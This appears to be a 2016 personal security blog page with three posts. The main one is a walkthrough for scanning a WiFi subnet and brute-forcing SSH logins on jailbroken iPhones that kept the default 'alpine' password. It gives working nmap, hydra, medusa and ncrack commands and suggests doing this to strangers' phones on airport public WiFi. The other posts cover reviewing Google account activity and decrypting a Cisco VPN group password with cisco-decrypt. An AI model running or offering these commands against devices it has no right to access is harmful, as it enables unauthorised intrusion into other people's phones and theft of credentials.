Friday, November 4, 2016

Scan a subnet to find out jailbreak iPhone with default password

After jailbreak, most of the users will install OPENSSH on their IOS device. However, some of the users might not know or just forgot to change the default password. Below is the user list of an iPhone:



The default password of the username root and mobile is “alpine”.

So our goal is to scan a whole subnet and find if there are any jailbroken IOS devices can be SSH login with the default username and password.

Tools: nmap (v7.01)  , hydra (v8.1) or medusa (v2.2) or ncrack (v0.4ALPHA).

1.     Connect your computer to the wireless network and find out the IP range: 192.168.1.9/24.

2.     Use nmap to generate a hosts list: nmap -sL 192.168.1.9/24 | grep "Nmap scan report" | awk '{print $NF}' > hosts.lst

3.     Or if you only want to scan the live hosts, you can use command: nmap -sP -n 192.168.1.9/24 | grep "Nmap scan report"| awk '{print $NF}' > liveHosts.lst

4.     Create 2 text files: username.txt and password.txt


5.     Run command: hydra -t 4 -L username.txt -P password.txt -M hosts.lst -s 22 ssh

6.     It took 12 minutes to get the password:


7.     Or you can use medusa: medusa -H liveHosts.lst -U username.txt -P password.txt -M ssh



8.     Ncrack also can do the job: ncrack -p ssh -U username.txt -P password.txt -iL liveHosts.lst --exclude 192.168.1.9. And you can press 'p' to list discovered credentials during the scan.

Following the steps above, you can easily modify the username and password file to perform a dictionary or brute force attack.

Ok, that’s it. Next time, you go to an airport, connect your Kali Linux to the free WIFI, have a cup of coffee and scan the whole subnet. You might be surprised. 

BTW, to change the password, just ssh to the iPhone with root and use command “passwd” and “passwd mobile”


Friday, July 15, 2016

Check Your Google account activity

It is a good security practice to check your Google Account activity history regularly.

1. Check Gmail login history
  1) Login to Gmail box, scroll down to the end of page, on the right-end side, there is a “Details” link.

 2) Click “Details”, brings you the Gmail login history:


    3) In case someone login to your account from other place, you can click “Sign out all other web sessions” to sign them out.
    4) It is recommended to select the “Show an alert for unusual activity.” Option.

2. Check Recently used devices
  1) Login to your Google account
  2) Open (Copy & paste) this link: https://security.google.com/settings/security/activity
  3) The page lists devices that have been active on your account in the last 28 days.


3. Check All activity history including web browsing:
  1) Login to your Google account.
  2) Open (Copy & paste) this link: https://myactivity.google.com/myactivity

Wednesday, June 29, 2016

Extract Cisco VPN group Password from .pcf file

So you got a .pcf file, it is easy to just copy it to the Cisco VPN folder in Windows. But for MacBook, you still need the Group password to set it up. 

In .pcf file, the Group Password is encrypted. You may want to decrypt the string to get the clear text password. There are some online Websites can do the job, however, you normally don’t want to submit this kind of information to public. 

Kali has the tool to decrypt it. Simply enter: 

#cisco-decrypt [Encrypted Group Password String]